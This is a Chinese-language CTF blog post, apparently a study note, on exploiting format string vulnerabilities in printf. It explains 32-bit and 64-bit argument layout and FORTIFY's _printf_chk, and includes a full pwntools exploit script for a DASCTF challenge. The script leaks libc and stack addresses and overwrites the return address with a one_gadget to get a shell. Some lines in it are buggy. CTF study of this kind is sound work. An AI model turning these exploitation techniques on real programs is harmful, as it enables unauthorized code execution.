
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>format利用 | Masco&#39;s blog</title>
    <meta name="author" content="Masco" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/background1.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>







<script src="https://s4.zstatic.net/ajax/libs/twikoo/1.6.31/twikoo.all.min.js"></script>



<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  

  <canvas
    id="fireworks"
    style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: 32767"
></canvas>
<script src="https://cdn.staticfile.org/animejs/3.2.1/anime.min.js"></script>
<script src="/js/fireworks.min.js"></script>

    <canvas
    id="background"
    style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: -1"
></canvas>
<script src="/js/background.min.js"></script>


    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>fufufufu~</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>MASCO&#39;S BLOG</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;MASCO&#39;S BLOG</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>format利用</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/7/20
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/pwn/" style="color: #ff7d73">
                    pwn
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/fmt/" style="color: #ffa2c4">
                    fmt
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <hr>
<h1 id="格式化字符串利用"><a href="#格式化字符串利用" class="headerlink" title="格式化字符串利用"></a>格式化字符串利用</h1><span id="more"></span>
<p>详细学习关于fmt的利用手法推荐b站国资，以及星盟</p>
<p>关于非栈上格式化字符串的利用在ctf中还是利用比较频繁的 ，可以仔细去学习这一专项。</p>
<p>tips:<br>1、寄存器顺序：rdi、rsi、rdx、rcx、r8、r9.<br>1、%c<br>2、%s<br>3、%p<br>4、%n，%hhn，%hn<br>5、%a<br>这个命令是利用于在程序开启  “FORTIFY“  时，所有的printf都会被_printf_chk所替代。  </p>
<p>_printf_chk与printf主要有以下几点不同：   </p>
<pre><code>1、在使用%n$p时要连续进行打印，如打印%1$p,就需要%1$p,%2$p连续使用。
2、在使用%n时会进行一些检查。
</code></pre>
<p>这时如果程序加了字数限制，漏洞利用就会变得很麻烦。<br>所以这里采用  %a  来进行泄露，但是不同的 是%a是泄露数据，并且是泄露上方的数据与其他格式化字符串截然相反的泄露方向。</p>
<br>
<br>


<h2 id="栈上格式化字符串（原理）"><a href="#栈上格式化字符串（原理）" class="headerlink" title="栈上格式化字符串（原理）"></a>栈上格式化字符串（原理）</h2><h3 id="32位"><a href="#32位" class="headerlink" title="32位"></a>32位</h3><p>1、由于在32位程序中，系统并不是采用的寄存器传参，所以关于printf的所有参数都会显示在栈上。<br>如同<br><img src="/images/format_stack.png" alt="图片"><br>其中依次存储的数据是prinf的内容、参数1、参数2、printf的返回地址。<br>如果我们用printf来打印其中的地址：</p>
<pre><code>printf(&quot;%p,%p&quot;,&quot;test&quot;,&amp;a);
</code></pre>
<p>首先程序会对函数依次进行以下操作：  </p>
<pre><code>1、读取内容   
2、如果遇到的是普通字符串则输入到缓冲区中      
3、如果遇到的是以%开头或转义字符，则程序进行解析，并作出与之对应的操作    
</code></pre>
<p>进行完这些程序就会打印出下面的结果<br><img src="/images/result.png" alt="图片"><br>第一个地址是“test”的地址，第二个地址是变量a的地址。<br>根据以上的规律我们不难发现利用%p，pritnf就会依次从esp-4的位置打印出地址。<br> 同时我们也可以了解到在使用类如  ”%n$p”  的n参数代表的是相较于格式化字符串的相对位置。</p>
<p>根据以上的例子我们可以知道printf的基本原理，那么利用printf也就一目了然了，printf的利用也是无非在原理的基础利用程序本身的逻辑漏洞，或函数漏洞来进行攻击。<br><br><br><br></p>
<h3 id="64位"><a href="#64位" class="headerlink" title="64位"></a>64位</h3><p>1、在64位程序中我们知道，程序改为先用寄存器来进行依次传参，所以原本的</p>
<pre><code>printf(&quot;%p,%p&quot;,&quot;test&quot;,&amp;a);
</code></pre>
<p>就会将%p先存储在rdi中然后剩下的参数就按顺序依次存储在剩下的5个寄存器中。  </p>
<p>所以64位中若是想要泄露栈上的地址应该要先从  %6$p 开始。  </p>
<p>2、除了寄存器传参剩下就和32位程序一致了。   </p>
<br>
<br>   
                        
<p>2、<br>先可以通过例题回忆一下<br>DASCTF<br><img src="/images/dactf_fmtN.png" alt="图片"><br>类似这种read的变量非栈上时，并且只有一个main函数时，就可以利用改写ret的地址为onegadget。   </p>
<pre><code>!/usr/bin/python3
from pwn import *
from LibcSearcher import *
import os

context(os=&#39;linux&#39;, arch=&#39;amd64&#39;, log_level=&#39;debug&#39;)
# context(os=&#39;linux&#39;, arch=&#39;i386&#39;, log_level=&#39;debug&#39;)


#context.terminal = [&#39;xterm&#39;, &#39;-e&#39;]
context.terminal = [&#39;xfce4-terminal&#39;, &#39;-e&#39;]
#终端更换

p=process(&quot;./pwn&quot;)
p= remote(&#39;node5.buuoj.cn&#39;,28406)
libc = ELF(&quot;libc.so.6&quot;)
elf = ELF(&quot;./pwn&quot;)

def op():
    gdb.attach(p)
    pause()

def inter():
    p.interactive()
    
def sa(content,payload):
    p.sendafter(content,payload)
    
def sla(content,payload):
    p.sendlineafter(content,payload)

def uc64():
    u64(p.recvuntil(b&quot;\x7f&quot;)[-6:].ljust(8,b&#39;\x00&#39;))

def uc32():
    u32(p.recvuntil(b&quot;\xf7&quot;)[-4:].ljust(4,b&#39;\x00&#39;))

def exec_fmt(pad):#自动获取到fmt的pad
    p = process(&quot;./fmt&quot;)
    # send 还是 sendline以程序为准
    p.send(pad)
    return p.recv()
payload=b&#39;%3$p&#39;+b&#39;%6$p&#39;
sa(&quot;keyword&quot;,payload)
p.recvuntil(b&#39;0x&#39;)
got=int(p.recv(12),16)-0x10-libc.sym[&#39;read&#39;]
print(&quot;got=&quot;,hex(got))
p.recvuntil(b&#39;0x&#39;)
stack=int(p.recv(12),16)-0xc8+0x10
tar=stack+0xe0-0x100
print(&quot;tar=&quot;,hex(tar))
print(&quot;stack=&quot;,hex(stack))
p.recvuntil(b&#39;0x&#39;)
one=got+0xf1247
print(&quot;one=&quot;,hex(one))


payload=(b&#39;%&#39;+str(tar&amp;0xffff).encode()+b&#39;c%11$hn\x00&#39;)
p.recvuntil(b&#39;keyword&#39;)
print(&quot;offest=&quot;,hex(offest))
p.send(payload)
#改写当前链为ret的链

payload=(b&#39;%&#39;+str((one&amp;0xffff)).encode()+b&#39;c%37$hn\x00&#39;)
p.recvuntil(b&#39;keyword&#39;)
p.send(payload)
p.recv()
 #改ret第二位为one

payload=(b&#39;%&#39;+str((tar&amp;0xffff)+2).encode()+b&#39;c%11$hn\x00&#39;)
p.recvuntil(b&#39;keyword&#39;)
print(&quot;offest=&quot;,hex(offest))
p.send(payload)
#ret地址+2

print(&quot;offest=&quot;,hex(offest))
one=one&gt;&gt;16
payload=(b&#39;%&#39;+str((one&amp;0xffff)).encode()+b&#39;c%37$hn\x00&#39;)
print(&quot;offest=&quot;,hex(offest))
p.recvuntil(b&#39;keyword&#39;)
p.send(payload)
#改ret地址+2的第二位地址为one

inter()
</code></pre>
<p>首先肯定是利用prinf先打印出栈地址和libc地址。<br>再用gdb调试看看栈的调用情况.</p>
<p><img src="/images/gdb_fmt.png" alt="图片"></p>
<p>可以看到ret链的是__libc_start_main函数，只有这一个所以没办法直接改。<br>不过我们看到后面有一条调用链，有两个一个以上的调用，所以可以将这个后面的调用链改成ret的调用链，即将 0x7fffffffe57c 改为 0x7fffffffe218,这样就会链上ret链。</p>
<p><img src="/images/fmt_ret.png" alt="图片"></p>
<p>像这样这就链起来辣！<br>链起来之后就只要修改<br><img src="/images/gdb_ret.png" alt="图片"><br>将这一部分修改为onegadget就可以了，其中在修改时很大概率不能四字节一起修，但是one与ret的地址又有三字节不相同，所以需要两字节修改两次，或者一字节修改三次。这时需要ret地址+1或2来对剩下的地址再次进行修改。        </p>
<p>修改完之后就可以getshell了。</p>
<hr>

    </div>
    
    
    
    
    
    
    <div id="comment">
        <div id="twikoo-container"></div>
    </div>
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2024 - 2024 Masco&#39;s blog
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;Masco
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    



<script>
    twikoo.init({
        el: "#twikoo-container",
        envId: "",
        region: "",
        path: location.pathname,
        lang: "",
    })
</script>


    
</body>
</html>